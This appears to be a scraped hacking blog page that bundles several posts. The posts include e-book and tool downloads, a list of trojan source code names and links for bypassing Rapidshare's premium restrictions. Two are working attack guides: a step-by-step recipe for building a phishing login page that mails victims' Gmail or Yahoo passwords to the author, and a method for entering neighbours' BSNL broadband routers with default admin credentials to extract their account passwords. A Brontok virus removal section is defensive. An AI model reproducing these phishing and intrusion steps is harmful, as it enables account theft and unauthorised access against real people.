21 Hacking E-Books  

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21 E-books

  1. Wireless Hacking - The Invisible Network
  2. Web Hacking- Attacks and Defence
  3. Underground Guide - Hacking - How to Crack Shareware
  4. The Hacker's Handbook
  5. The Newbies Handbook- How to begin in the World of Hacking
  6. Maximum Security - A Hacker's Guide to Protecting Your Internet Site and Network
  7. How to Make Key Generators
  8. How to crack any cd protection
  9. Hacking Wireless Networks For Dummies
  10. Hacking the Cable Modem
  11. Hacking Secrets Revealed
  12. Hacking Into Computer Systems - Beginners
  13. Hacking for Dummies (Volume 2)
  14. Hacking - Firewalls And Networks How To Hack Into Remote Computers
  15. Hacker's Desk Reference
  16. Hackers Black Book (German)
  17. Hack Attacks Revealed
  18. Google as a hacking tool
  19. Dangerous Google - Searching for Secrets
  20. Computer Science - Hacking Exposed Networks Secrets & Solutions (3rd Edition)
  21. Advanced SQL Injection In SQL Server Applications

Download Link:


Create your own f@ke login page!!! by Jotform  

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Fake login page is a fake page which you can use to hack others username and password. Fake login page looks exactly like the original page and if someone login in your page using his original username and password, the username and password will be mailed to youThe process of Hacking anyone’s id using fake login pages is known as Phishing
Now let’s learn how to create your very own fake login page.
{1} Open www.jotform.com and Sign Up.
{2} then Login there with your newly registered account.
{3} now click on ‘ Create your first form’.
{4} Now delete all the pre-defined entries, just leave ‘First Name:’ (To delete entries, select the particular entry and then click on the cross sign.)
{5} Now Click on ‘First Name:’ (Exactly on First Name). Now the option to Edit the First Name is activated, type there “username:” (for Gmail) or YahooId: (for Yahoo)
{6} Now Click on ‘Power Tool’ Option (In right hand side…)
{7} Double click on ‘Password Box’. Now Click the newly form password entry to edit it. Rename it as ‘Password:’
{8} Now Click on ‘Properties’ Option (In right hand side…). These are the form properties.
{9} You can give any title to your form. This title is used to distinguish your forms. This Title cannot be seen by the victim.
{10} Now in Thank You URL you must put some link, like http://www.google.com or anything. Actually after entering username & password, user will get redirect to this url.(Don’t leave it blank…)
{11} Now Click on ‘Save’. After saving, click on ‘Source’ Option.
{12} Now you can see two Options, namely ‘Option1′ & ‘Option2′. Copy the full code of ‘Option2′.{13} Now open Notepad text editor and write the following code their.Paste the Option2 code here
{14} And now save this as index.html. And then host it, mean you will have to put it on the internet so that everyone can view it. Now i think that you would be knowing it and if in case you do not know it please leave a comment with your email-id and i will mail you how to do it.Now you can view it by typing the url in the address bar.NOTE: If u want to send it to the internet, then first you will have to create a hosting account which you can create on www.110mb.com and there are many other sites which you can find on the internet very easily.I suppose that you created your account at 110mb.comnow login to your account then click on “File Manager”, then click on “upload files” or just “upload”. Then select the file which you want to send to the internet and click on upload. And you are done.Now you can access you file on the net by just typing the url ofthe file.And you will receive password of the users that login to your site through email-id which you’ve entered while creating the form.

Recover Lost Instant Messenger Passwords - GTalk, MSN,Yahoo! or Windows Live.  

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MessenPass is a password recovery utility that allows you to recover password(s) of all the popular instant messengers: MSN,GTalk, AOL,Yahoo!Messenger,Windows Live Messenger.

List of usernames and passwords recoverd by the application

The moment you run MessenPass, it automatically decrypts the available passwords, and displays all user name/password pairs that it found in the main window of the application.It will work even without running the messenger at that time.

Only condition is you have chosen the remember your password option in one of the above programs. And also you cannot use this utility for grabbing the passwords of other users, it works only for current logged-on user on your local computer.

This application also supports saving the usernames/passwords to a file instead of displaying on screen. If you want to save to a file directly then use the following switch while launching


»Download MessenPass

Rapidshare premium link generators  

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I know this topic interests everyone. Rapidshare was one of the best file hosting site available. It is very hard to bypass its restrictions. The only way out is to buy a Premium account. I have one bought a Premium account, being a premium user is very coool rather than to download as a free user. I have collected a list of RS premium link generators....

I know that many of them dont work... But still presenting a list of them.... Its your wish to test them...If something works good please notify me in the comments section.

  1. http://www.yourpremiums.com/
  2. http://megaez.com/
  3. http://khongbiet.com/
  4. http://mymegalink.net/
  5. http://rapid-hook.com/
  6. http://www.rapidl.com/
  7. http://www.rapidrip.com/
  8. http://computeraxes.com/rapid
  9. http://rapid-hook.com/
  10. http://www.rapidsharepremiumlinkgenerator.com/
  11. http://rapidlysharing.com/
  12. http://www.rapidshareplus.com/
  13. http://www.fastlister.net/rs/
  14. http://www.lcheat.com/rs7/
  15. http://rapid-ripping.com/
  16. http://x92.org/
  17. http://www.rapidshare.co.in/
  18. http://www.rapidleechers.com/
  19. http://www.rapidshare-premium-downloader.com/
  20. http://www.premium4me.com/rapid.html
  21. http://www.premiumrapid.com/rapid.html
  22. http://www.download-crazy.com/rapid
  23. http://www.grab-w.net/
  24. http://rapid.lin.co.il/
  25. http://rapidlysharing.com/
  26. http://rapidlysharing.com/
  27. http://www.t5f.net/
  28. http://www.rapid-premium.wb.st/
  29. http://www.premium4me.com/
  30. http://www.premiumrapid.com/

[ VB ] 26 Trojan sourcecodes  

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[VB]stealth eye
[VB]pzza cod
[VB]pasword crack
[VB]Messiah 2.0 [Private]
[VB]Controla Machine
[VB]Black Dream
[VB]Basic Trojan Horse


Remove Brontok Virus Urself  

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Its the most sticky virus ..
u can Remove it
be an ethical Hacker
It works~~!!

Start ur computer in safe mode with command prompt and type the followinf command to enable registry editor:-

reg delete HKCU\software\microsoft\windows\currentversion\policies\system /v "DisableRegistryTools"
and run HKLM\software\microsoft\windows\currentversion\policies\system /v "DisableRegistryTools"

after this ur registry editor is enable
type explorer
go to run and type regedit
then follow the following path :-

on the right side delete the entries which contain 'Brontok' and 'Tok-' words.

after that restart ur system
open registry editor and follow the path to enable folder option in tools menu

HKCU\Software\Microsoft\Windows\Currentversion\Policies\Explorer\ 'NoFolderOption'
delete this entry and restart ur computer

and search *.exe files in all drives (search in hidden files also)
remove all files which are display likes as folder icon.
u r computer is completely free from virus brontok.

30 best hacking softwares  

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30 best hacking softwares

i have collected 30 best hacking tools and softwares and i tryed working 100%
download this below ones

Part 1
Part 2
Part 3
Part 4
Part 5
Part 6


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This is a simple trick to hack bsnl broadband accounts...... no need to worry because it does not have any danger........

* know your ip address:- from this site:- http://www.whatismyip.com/
* Download:- ip scanner from site :-http://www.angryziber.com/w/Download
* open ip scanner.
* go to options tab\ select port\ and enter 80 in the 1st option. (enter port to scan)
* In the hostname option paste your ip address.....
* Click on the ip button next to the hostname(the one with a green arrow pointing up words..)
* After u click on it, it will automatically fill the ip range option..
* In the 1st option let it be your ip and the in the 2nd option fill ip greater than your.....(eg. ip your ip is then in the next option fill as
* click scan..
* it will give u a list of ips....
* there will be some ip's which will have a green light on its left side.
* select that ip and press :- ctrl +1 (not the no. pad one) or right click on that ip and select the option 'open computer' and then select the option in browser.....
* then it will ask for user name and pass.
* in user name type :- admin
* in pass type :- admin
* if it does not take try on other ip's with green light.
* when the page gets open go to home and click on 'WAN'.
* there u will get the users id and pass in coded form....
* download this password revealer:- http://www.scanwith.com/X-Pass_download.htm
* Extract file from that and then run 'x-pass'.
* drag the 'x' icon in the pass. field and u will get the pass.
* to check the pass :-

thats it........ enjoy..........
Note: This trick usually work for me and my friends but i can say theat it would work with your network too.

FBI Forensic Field Kit : Wireless Hacking Live DVD  

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This is the ultimate bootable Disk for the agent, (or wannabe agent)

Live CD with all the tools you need to hack a WLAN / wireless Access point -
Linux Live-CD

For details what is inside this please check


Part 01
Part 02
Part 03
Part 04
Part 05
Part 06
Part 07
Part 08
Part 09
Part 10
Part 11
Part 12

(above one is checked by me and is working perfectly)


Part 01
Part 02
Part 03
Part 04
Part 05
Part 06
Part 07
Part 08
Part 09
Part 10
Part 11
Part 12